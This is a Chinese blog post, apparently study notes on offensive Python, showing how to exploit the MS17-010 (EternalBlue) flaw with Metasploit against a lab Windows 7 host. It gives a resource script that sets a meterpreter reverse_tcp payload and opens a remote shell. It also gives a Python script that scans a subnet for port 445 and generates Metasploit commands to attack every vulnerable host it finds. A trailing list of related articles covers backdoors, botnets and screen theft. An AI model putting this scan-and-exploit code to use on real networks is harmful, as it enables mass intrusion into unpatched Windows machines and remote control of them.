Python黑客攻防(十五)编写Python脚本与Metasploit交互

最新推荐文章于 2024-09-29 12:11:12 发布
最新推荐文章于 2024-09-29 12:11:12 发布
阅读量1.6k 收藏 18
点赞数
分类专栏: Python黑客编程 文章标签: python 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681532/article/details/109587772
版权

注:本篇文章为个人学习笔记仅供学习交流,请勿用于非法用途。参考:《Python绝技:运用Python成为顶级黑客》。
更多干货请关注微信公众号:黑客帮。

在进行编写与Metasploit交互的脚本前,我们先简单运用Metasploit利用ms17-010(永恒之蓝)漏洞对目标主机实现攻击。详细教程见->利用永恒之蓝漏洞(MS17-010)入侵电脑
目标主机:Windows7 IP:192.168.1.10
攻击主机:kalilinux IP:192.168.1.14

步骤:


(1)在kalilinux桌面创建一个以’.rc’为后缀的文件,我创建的是‘smb.rc’,然后填入下面的命令。 

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.10
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.10
set payload windows/x64/meterpreter/reverse_tcp
exploit -j -z

在这里插入图片描述

(2)右击文件smb.rc,在此打开终端。输入如下命令,回车。

msfconsole -r smb.rc

(3)看到如下出现状态,继续按回车,然后输入如下命令即可建立会话运行命令,具体利用可以见->利用永恒之蓝漏洞(MS17-010)入侵电脑

sessions -i 1

在这里插入图片描述在这里插入图片描述(4)输入shell就可以进入Windows的cmd命令界面了。

在这里插入图片描述

编写python脚本


可以用python编写一个能扫描445端口的主机,并自动生成一个去攻击所有有漏洞主机的Metasploit脚本文件的Python脚本。 

# coding=utf-8
import nmap
import os
import optparse
import sys

def findTgts(subNet):
    nmScan = nmap.PortScanner()
    nmScan.scan(subNet, '445')
    tgtHosts = []
    for host in nmScan.all_hosts():
        # 若目标主机存在TCP的445端口
        if nmScan[host].has_tcp(445):
            state = nmScan[host]['tcp'][445]['state']
            # 并且445端口是开启的
            if state == 'open':
                print '[+] Found Target Host: ' + host
                tgtHosts.append(host)
    return tgtHosts


def setupHandler(configFile, rhost):
    configFile.write('use auxiliary/scanner/smb/smb_ms17_010\n')
    configFile.write('set rhosts '+rhost+'\n')
    configFile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configFile.write('set rhosts ' + rhost + '\n')
    configFile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
    configFile.write('exploit -j -z\n')

    # 设置全局变量DisablePayloadHandler,让已经新建一个监听器之后,后面的所有的主机不会重复新建监听器
    # 其中setg为设置全局参数
    configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile, tgtHost):  # tgtHost为目标的IP
    configFile.write('use auxiliary/scanner/smb/smb_ms17_010\n')
    configFile.write('set rhosts ' + str(tgtHost) + '\n')
    configFile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configFile.write('set rhosts ' + str(tgtHost)  + '\n')
    configFile.write('set payload windows/x64/meterpreter/reverse_tcp\n')

    # -j参数表示攻击在后台进行,-z参数表示攻击完成后不与会话进行交互
    configFile.write('exploit -j -z\n')

findTgts()函数中实现对整个网段的主机445端口的扫描,setupHandler()函数实现目标主机被攻击后进行远程交互的监听器的功能,confickerExploit()函数实现命令执行,代码未完整,可后续自行补充。

微信公众号:黑客帮
在这里插入图片描述

肥胖喵
关注
专栏目录
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
热门推荐
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
Python黑客攻防(一)屏幕窃取
qq_43681532的博客
07-05 4141
注:本篇文章仅供学习交流,请勿用于非法用途 ,否则后果自负。转载自微信公众号:黑客帮,大神勿喷。 原理:使用SMTP协议及截图函数完成屏幕截取并自动发送到指定邮箱。 步骤: 1.邮箱开启SMTP服务,记住授权码。 登录网页版邮箱->设置->账户,找到SMTP服务将其开启,记住授权码。 2.代码解析。 截图函数 time.sleep()表示休眠这里为5,表示代码暂停5秒,该函数每5秒就截一张图在D盘中覆盖保存。 #截图 def imG(): i = 1 while True:
Python黑客攻防,构建SSH僵尸网络!黑客也不难撒!
爬遍所有网站
07-24 291
前言 攻击者在达成恶意目的时,通常会使用被黑掉的计算机群。我们称之为僵尸网络”,因为被黑掉的电脑会像僵尸一样执行指令。 为构建僵尸网络,我们必须引入一一个新的概念一类。类的概念是面向编程对象和编程模型的基础。在这一编程模型中,我们会把各个对象和它们所关联的方法一起实例化。在我们的僵尸网络中,每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力。 ...
常见的网络攻防技术——黑客攻防(通俗易懂版)
最新发布
A13531922962的博客
09-29 1276
在世界人口近80亿的地球上,每天尚且发生数以百万计的抢劫打架斗殴事件,网络更是如此,网络攻防战几乎每时每刻都在发生。如果说打架斗殴枪击事件离我们还很远,那网络攻防战在你打开手机的时候就开始了!博主能力有限,暂不谈网络攻防具体操作实现过程,我们用通俗易懂的语言一块聊聊——神秘的“网络攻防”每当听到“网络攻防”这个名词,有没有一瞬间觉得很神秘?脑海中是否下意识的出现身穿黑色连衣帽的黑客中黑入某机构网站的场景?其实它并没有想象中的那么神秘,接下来我们一块唠唠常见的几种常见的网络攻防技术。
Python黑客攻防(十)编写端口扫描器
qq_43681532的博客
07-21 843
注:本篇文章仅供学习交流,欢迎关注微信公众号:黑客帮。 参考:《Python绝技:运用Python成为顶级黑客》。 前言 任何一个靠谱的网络攻击都是起步于侦查的。攻击者必须在挑选并确定利用目标中的漏洞之前找出目标在哪里有漏洞。在本篇文章中,我们将编写一个扫描目标主机开放的TCP端口的侦查小脚本。当然,为了与TCP端口进行交互,我们先要建立TCP套接字。 与大多数现代编程语言一样,Python也提供了访问BSD套接字的接口。BSD套接字提供了一个应用编程接口(API) ,使程序员能编写在主机之间进行网络通信的
新手Python黑客工具入门
weixin_34402090的博客
09-28 629
为了满足新手对Python的追求,特写了三个初级Python入门工具。第一期写了三个初级工具,希望新手看完以后可以对Python脚本有一个基本了解。高手请绕过此文章!一件套 pythond requests模块构造一个whois信息收集器二件套 python编写一个arp断网攻击三件套 目录信息收集简单梳理一下此工具需要具备哪些功能。脚本获取信息如下:IP信息、子域名、备案、注册人、邮箱、地址、...
Python黑客攻防(八)密码破解攻击
qq_43681532的博客
07-16 4541
前言 进行黑客攻击通常需要做大量重复性工作。如果黑客直接通过浏览器攻击Web网站,就要不断手动修改输入值,并反复点击。但如果可以在应用程序内部访问Web网站并接收结果值,那么只需要使用简单的几行代码就能成功攻破目标网站。本篇文章讲解对网站的登入密码进行暴力破解。 准备 python环境 靶场->Python黑客攻防(四)搭建测试环境 教程 1.先开启靶场,浏览器输入http://127.0.0.1/wp-login.php,该页面可以输入用户名和密码,是我们的目标页面。 2.了解python是如何调
Python黑客攻防(九)编写后门程序
qq_43681532的博客
07-16 5336
前言 本篇文章讲解如何编写后门程序,并实践测试运行,通过后门程序查找文件。 后门基本概念 防火墙用于拦截用户从外部访问服务器。访问服务器的Telnet、FTP等服务只限允许的用户使用。防火墙并不会阻断用户从内部向外部的访问路径。虽然很难从外部侵入防火墙,但一旦成功,黑客就能轻松窃取敏感信息。后门技术用于绕过防火墙等安全设备,掌控服务器资源。安装于目标服务器的后门客户端会接收并运行来自后门服务器的命令,并将运行结果发送给后门服务器。 利用后门发动攻击时,最困难的是向目标系统安装后门客户端。通过网络直接上传文件
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
【进阶】使用Python进行网络攻防演示
[【进阶】使用Python进行网络攻防演示](https://img-blog.csdnimg.cn/direct/bdbbe0bfaff7456d86e487cd585bd51e.png) # 2.1.1 使用Python进行网络扫描 在Python中,可以使用`socket`模块和`scapy`库进行网络扫描。`...
python黑客图片_Python黑客攻防(一)屏幕窃取
weixin_39812186的博客
12-02 416
注:本篇文章仅供学习交流,请勿用于非法用途 ,转载请标明出处,大神勿喷。原理:使用SMTP协议及截图函数完成屏幕截取并自动发送到指定邮箱。步骤:1.邮箱开启SMTP服务,记住授权码。登录网页版邮箱->设置->账户,找到SMTP服务将其开启,记住授权码。2.代码解析。截图函数time.sleep()表示休眠这里为5,表示代码暂停5秒,该函数每5秒就截一张图在D盘中覆盖保存。#截图def ...
Python黑客攻防(四)搭建测试环境
qq_43681532的博客
07-08 872
注:转载请标明出处。首发微信公众号:黑客帮。 可在物理机也可在虚拟机配置。 准备: phpStudy: phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。 WordPress: WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自
python调用metasploit_Python 远程调用MetaSploit
weixin_39846089的博客
12-04 215
(1)安装Python的msgpack类库。MSF官方文档中的数据序列化标准就是參照msgpack。root@kali:~#apt-getinstallpython-setuptoolsroot@kali:~#easy_installmsgpack-python(2)创建createdb_sql.txt:createdatabasemsf;createusermsfwithp...
python安全工程师倾囊传授30多种黑客攻防实战技术|云|盘
leo_py的博客
09-21 680
黑客技术你也可以学会 黑客,在大多数普通网民的印象中都是非常神秘的网络终结者形象。 他们在网络中攻无不克、战无不胜,似乎无所不能,电影里塑造形象的黑客形象通常是,黑客手拿掌上pad,双手飞速敲出几行复杂的代码,然后突然打开了一个安保级别非常高的系统,那么黑客是真的防不胜防,“码力无边”吗? 实际上,黑客的技术并没有多么复杂,一个没有什么编程基础的网络小白,在科学的方法指导下也可以很快地成为一名合格的黑客Python安全专家11招黑客攻击秘籍网|盘下载点此 网络攻击的30种常见方..
python神器_教你用Python玩转神器Metasploit
weixin_39733146的博客
11-23 437
pymsf是著名安全研究团队Spiderlabs实现的一个PythonMetasploit msgrpc进行通信的python模块,通过它,你可以利用Python玩转渗透测试框架Metasploit。使用步骤首先你需要先启动msgrpc服务,命令如下:load msgrpc Pass=与msgrpc进行通信其实就是与msfconsole进行通信,首先你需要创建一个msfrpc的类,登录到msgr...
Python语言在黑客攻击中的应用
leah126的博客
10-28 693
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Python实现的黑客技术
wananxuexihu的博客
06-20 1338
近年来,网络安全领域频繁出现黑客攻击事件,成为备受关注的问题。然而,黑客技术并非神秘不可捉摸,任何人只要愿意学习,都能掌握一些基础的黑客技能。本文将介绍几种常见的黑客技术及其实现方法,以便让大家了解黑客技术的基本原理。同时,我们还会提供Python代码示例,以供读者实际操作练习。需要强调的是,本文旨在教育目的,强调合法合规,不鼓励任何违法行为。上述代码使用了Python的库进行并发编程,以加快端口扫描的速度。是Python标准库中的一个模块,用于支持多进程编程。
python黑客攻防入门
07-04
"Python 黑客攻防入门"通常指的是网络安全领域的学习资源,它旨在帮助读者理解如何使用Python这门语言来进行安全测试、漏洞分析和防御措施。以下是一些基本概念和内容概述: 1. **基础知识**:首先,你需要了解Python的基础语法,如变量、数据类型、控制流等,因为这些是攻防操作的基础。 2. **网络工具**:Python中有许多库,如Scapy(用于网络协议分析)、Nmap(网络扫描)和Metasploit(渗透测试框架),可以帮助你理解和实践网络攻击和防御。 3. **漏洞利用**:学习如何识别常见的软件漏洞(如SQL注入、跨站脚本等),并使用Python编写简单的exploits(利用代码)。 4. **道德黑客(Ethical Hacking)**:虽然名为“入门”,但它强调的是合法的安全评估,而不是恶意破坏。会讲解渗透测试许可证和合规性的重要性。 5. **防御技术**:包括防火墙设置、入侵检测系统(IDS/IPS)配置,以及Python在创建Web应用防护和日志分析中的应用。 6. **加密与解密**:了解基础的加密原理,并用Python处理常见的加密算法和密码学概念。 相关问题: 1. Python中哪些库常用于网络安全攻防? 2. 初学者应该如何平衡Python黑客攻防的学习和伦理准则? 3. 在实际工作中,Python黑客攻防的知识有哪些应用场景?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值